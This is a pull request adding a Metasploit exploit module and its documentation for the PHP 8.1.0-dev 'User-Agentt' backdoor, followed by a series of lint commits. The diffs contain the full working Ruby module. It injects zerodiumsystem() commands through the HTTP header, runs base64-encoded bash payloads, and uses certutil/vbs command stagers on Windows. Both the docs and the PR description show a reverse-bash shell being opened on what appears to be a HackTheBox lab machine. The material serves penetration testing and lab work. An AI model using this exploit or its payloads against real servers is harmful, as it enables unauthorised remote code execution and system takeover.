### PR TITLE
Add module php-dev-8.1 backdoor and Docs

### DIFF
--- a/documentation/modules/exploit/multi/http/php_useragentt_rce.md
+++ b/documentation/modules/exploit/multi/http/php_useragentt_rce.md
@@ -1,0 +1,27 @@
+## Description
+Exploits a backdoor RCE in PHP version 8.1.0-dev
+
+## Software Link
+https://github.com/phpdaily/php/tree/master/8.1-dev/
+
+## Verification Steps:
+```
+msf6 > use exploit/multi/http/php_useragentt_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/php_useragentt_rce) > set rhosts knife.htb
+rhosts => knife.htb
+msf6 exploit(multi/http/php_useragentt_rce) > set lhost tun0
+lhost => tun0
+msf6 exploit(multi/http/php_useragentt_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/php_useragentt_rce) > run
+
+[*] Started reverse TCP handler on 10.10.14.108:4444 
+[+] Sending shellcode
+[*] Command shell session 7 opened (10.10.14.108:4444 -> 10.10.10.242:35572) at 2021-08-23 18:21:47 +0530
+
+
+id
+uid=1000(james) gid=1000(james) groups=1000(james)
+```
+

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200 && res.body.to_s.include?(fingerprint)
      Exploit::CheckCode::Appears
     else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -24,16 +24,17 @@ class MetasploitModule < Msf::Exploit::Remote
             'Gaurav Purswani' # @pingport80 (Metasploit Module)
           ],
         'Platform' => %w[unix win],
-        'Targets'   =>
+        'Targets' =>
           [
-            ['windows',
+            [
+              'windows',
               {
                 'Arch' => [ ARCH_X64, ARCH_X86 ],
                 'Platform' => 'win',
                 'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
               }
             ],
-            ['unix', {'Arch'  => ARCH_CMD, 'Platform' => 'unix' }]
+            ['unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' }]
           ],
         'References' =>
           [
@@ -84,8 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts)
-  	send_command("cmd.exe /q /c #{cmd}")
+  def execute_command(cmd, _opts)
+    send_command("cmd.exe /q /c #{cmd}")
   end
 
   def send_command(cmd)
@@ -105,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['Platform'] == 'unix'
       send_command(payload_unix)
     else
-      execute_cmdstager({:linemax=>500})
+      execute_cmdstager({ linemax: 500 })
     end
   end
 end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -23,31 +24,17 @@ class MetasploitModule < Msf::Exploit::Remote
             'Gaurav Purswani' # @pingport80 (Metasploit Module)
           ],
         'Platform' => %w[unix win],
-        'Arch' => ARCH_CMD,
-        'Targets' =>
-            [
-              [
-                'Unix (in-memory)',
-                {
-                  'Platform' => 'unix',
-                  'Arch' => ARCH_CMD,
-                  'Type' => :unix_memory,
-                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-                }
-              ],
-              [
-                'Windows (CMD In-Memory)',
-                {
-                  'Platform' => 'windows',
-                  'Arch' => ARCH_CMD,
-                  'Type' => :windows_cmd,
-                  'DefaultOptions' => {
-                    'PAYLOAD' => 'cmd/windows/generic',
-                    'DisablePayloadHandler' => true
-                  }
-                }
-              ]
+        'Targets'   =>
+          [
+            ['windows',
+              {
+                'Arch' => [ ARCH_X64, ARCH_X86 ],
+                'Platform' => 'win',
+                'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
+              }
             ],
+            ['unix', {'Arch'  => ARCH_CMD, 'Platform' => 'unix' }]
+          ],
         'References' =>
           [
             ['https://flast101.github.io/php-8.1.0-dev-backdoor-rce/'], # original writeup
@@ -58,11 +45,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         },
         'Privileged' => false,
         'DisclosureDate' => '2021-05-23',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 2
       )
     )
 
@@ -76,10 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def payload_unix
     encoded_payload = Base64.strict_encode64(payload.encoded)
     "echo -n #{encoded_payload} | /bin/base64 -d | /bin/bash"
-  end
-
-  def payload_win
-    "cmd.exe /q /c #{payload.encoded}"
   end
 
   def check
@@ -101,6 +84,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def execute_command(cmd, opts)
+  	send_command("cmd.exe /q /c #{cmd}")
+  end
+
   def send_command(cmd)
     uri = target_uri.path
     send_request_cgi({
@@ -118,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['Platform'] == 'unix'
       send_command(payload_unix)
     else
-      send_command(payload_win)
+      execute_cmdstager({:linemax=>500})
     end
   end
 end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -19,39 +19,44 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' =>
           [
-            'flast101',  # POC
-            'Gaurav Purswani'  #@pingport80 (Metasploit Module)
+            'flast101', # POC
+            'Gaurav Purswani'  # @pingport80 (Metasploit Module)
           ],
         'Platform' => %w[unix win],
         'Arch' => ARCH_CMD,
         'Targets' =>
-            [          
+            [
               [
-              'Unix (in-memory)',
-              {
-                'Platform' => 'unix',
-                'Arch' => ARCH_CMD,
-                'Type' => :unix_memory,
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-              }
+                'Unix (in-memory)',
+                {
+                  'Platform' => 'unix',
+                  'Arch' => ARCH_CMD,
+                  'Type' => :unix_memory,
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+                }
               ],
               [
-              'Windows (CMD In-Memory)',
-              {
-                'Platform' => 'windows',
-                'Arch' => ARCH_CMD,
-                'Type' => :windows_cmd,
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'cmd/windows/generic',
-                  'DisablePayloadHandler' => true
+                'Windows (CMD In-Memory)',
+                {
+                  'Platform' => 'windows',
+                  'Arch' => ARCH_CMD,
+                  'Type' => :windows_cmd,
+                  'DefaultOptions' => {
+                    'PAYLOAD' => 'cmd/windows/generic',
+                    'DisablePayloadHandler' => true
+                  }
                 }
-              }
               ]
             ],
         'References' =>
           [
             ['URL', 'https://www.exploit-db.com/exploits/49933']
           ],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
         'Privileged' => false,
         'DisclosureDate' => '2021-05-23',
         'DefaultTarget' => 0
@@ -100,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(uri),
       'headers' => {
         'Accept-Encoding' => 'gzip,deflate',
-        'User-Agentt' =>  "zerodiumsystem('#{cmd}');"
+        'User-Agentt' => "zerodiumsystem('#{cmd}');"
       }
     })
   end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 && res.body.to_s.include?(fingerprint)
-      return Exploit::CheckCode::Appears
+     Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def payload_win
-   "cmd.exe /q /c #{payload.encoded}"
+    "cmd.exe /q /c #{payload.encoded}"
   end
 
   def check
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 && res.body.to_s.include?(fingerprint)
-     Exploit::CheckCode::Appears
+      Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
     end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => []
+          'SideEffects' => [IOC_IN_LOGS]
         },
         'Privileged' => false,
         'DisclosureDate' => '2021-05-23',

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_command(cmd)
     uri = target_uri.path
-    return send_request_cgi({
+    send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(uri),
       'headers' => {

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -65,9 +65,13 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def encoded_payload
+  def payload_unix
     encoded_payload = Base64.strict_encode64(payload.encoded)
     return "echo -n #{encoded_payload} | /bin/base64 -d | /bin/bash"
+  end
+
+  def payload_win
+    return "cmd.exe /q /c #{payload.encoded}"
   end
 
   def check
@@ -89,16 +93,24 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def exploit
+  def send_command(cmd)
     uri = target_uri.path
-    print_good('Sending shellcode')
-    send_request_cgi({
+    return send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(uri),
       'headers' => {
         'Accept-Encoding' => 'gzip,deflate',
-        'User-Agentt' =>  "zerodiumsystem('#{encoded_payload}');"
+        'User-Agentt' =>  "zerodiumsystem('#{cmd}');"
       }
     })
+  end
+
+  def exploit
+    print_good('Sending shellcode')
+    if target['Platform'] == 'unix'
+      send_command(payload_unix)
+    else
+      send_command(payload_win)
+    end
   end
 end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def payload_unix
     encoded_payload = Base64.strict_encode64(payload.encoded)
-    return "echo -n #{encoded_payload} | /bin/base64 -d | /bin/bash"
+    "echo -n #{encoded_payload} | /bin/base64 -d | /bin/bash"
   end
 
   def payload_win

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' =>
           [
             'flast101', # POC
-            'Gaurav Purswani'  # @pingport80 (Metasploit Module)
+            'Gaurav Purswani' # @pingport80 (Metasploit Module)
           ],
         'Platform' => %w[unix win],
         'Arch' => ARCH_CMD,

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",
+        'Description' => %q{
+          This module can detect and exploit the backdoor of php-8.1-dev.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'flast101',  # POC
+            'Gaurav Purswani'  #@pingport80 (Metasploit Module)
+          ],
+        'Platform' => %w[unix linux],
+        'Arch' => ARCH_CMD,
+        'Targets' =>
+            [          
+              [
+              'Unix (in-memory)',
+              {
+                'Platform' => 'unix',
+                'Arch' => ARCH_CMD,
+                'Type' => :unix_memory,
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+              }
+              ],
+              [
+              'Windows (CMD In-Memory)',
+              {
+                'Platform' => 'windows',
+                'Arch' => ARCH_CMD,
+                'Type' => :windows_cmd,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/windows/generic',
+                  'DisablePayloadHandler' => true
+                }
+              }
+              ]
+            ],
+        'References' =>
+          [
+            ['URL', 'https://www.exploit-db.com/exploits/49933']
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2021-05-23',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the target file on the system', '/index.php'])
+      ]
+    )
+  end
+
+  def encoded_payload
+    encoded_payload = Base64.strict_encode64(payload.encoded)
+    return "echo -n #{encoded_payload} | /bin/base64 -d | /bin/bash"
+  end
+
+  def check
+    uri = target_uri.path
+    fingerprint = Rex::Text.rand_text_alpha(8)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(uri),
+      'headers' => {
+        'Accept-Encoding' => 'gzip,deflate',
+        'User-Agentt' => "zerodiumsystem('echo #{fingerprint}');"
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s.include?(fingerprint)
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    uri = target_uri.path
+    print_good('Sending shellcode')
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(uri),
+      'headers' => {
+        'Accept-Encoding' => 'gzip,deflate',
+        'User-Agentt' =>  "zerodiumsystem('#{encoded_payload}');"
+      }
+    })
+  end
+end

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ],
         'References' =>
           [
-            ['URL', 'https://www.exploit-db.com/exploits/49933']
+            ['EDB', '49933']
           ],
         'Notes' => {
           'Stability' => [],

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'flast101',  # POC
             'Gaurav Purswani'  #@pingport80 (Metasploit Module)
           ],
-        'Platform' => %w[unix linux],
+        'Platform' => %w[unix win],
         'Arch' => ARCH_CMD,
         'Targets' =>
             [          

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -50,7 +50,10 @@ class MetasploitModule < Msf::Exploit::Remote
             ],
         'References' =>
           [
-            ['EDB', '49933']
+            ['https://flast101.github.io/php-8.1.0-dev-backdoor-rce/'], # original writeup
+            ['https://news-web.php.net/php.internals/113838 '], # PHP's official statement
+            ['https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d'], # malicious commit which added the backdoor
+            ['https://github.com/php/php-src/commit/8d743d5281c29e9750e183804b7ba02e1ff82f0b']  # commit which resolved it
           ],
         'Notes' => {
           'Stability' => [],

--- a/modules/exploits/multi/http/php_useragentt_rce.rb
+++ b/modules/exploits/multi/http/php_useragentt_rce.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def payload_win
-    return "cmd.exe /q /c #{payload.encoded}"
+   "cmd.exe /q /c #{payload.encoded}"
   end
 
   def check


### PR DESCRIPTION
## Summary
This adds a module(and it's docs) which exploits the RCE backdoor found in the `php-dev-8.1`.

## Software Link
https://github.com/phpdaily/php/tree/master/8.1-dev/

## Verification Steps:
```
msf6 > use exploit/multi/http/php_useragentt_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/php_useragentt_rce) > set rhosts knife.htb
rhosts => knife.htb
msf6 exploit(multi/http/php_useragentt_rce) > set lhost tun0
lhost => tun0
msf6 exploit(multi/http/php_useragentt_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/php_useragentt_rce) > run

[*] Started reverse TCP handler on 10.10.14.108:4444 
[+] Sending shellcode
[*] Command shell session 7 opened (10.10.14.108:4444 -> 10.10.10.242:35572) at 2021-08-23 18:21:47 +0530

id
uid=1000(james) gid=1000(james) groups=1000(james)
```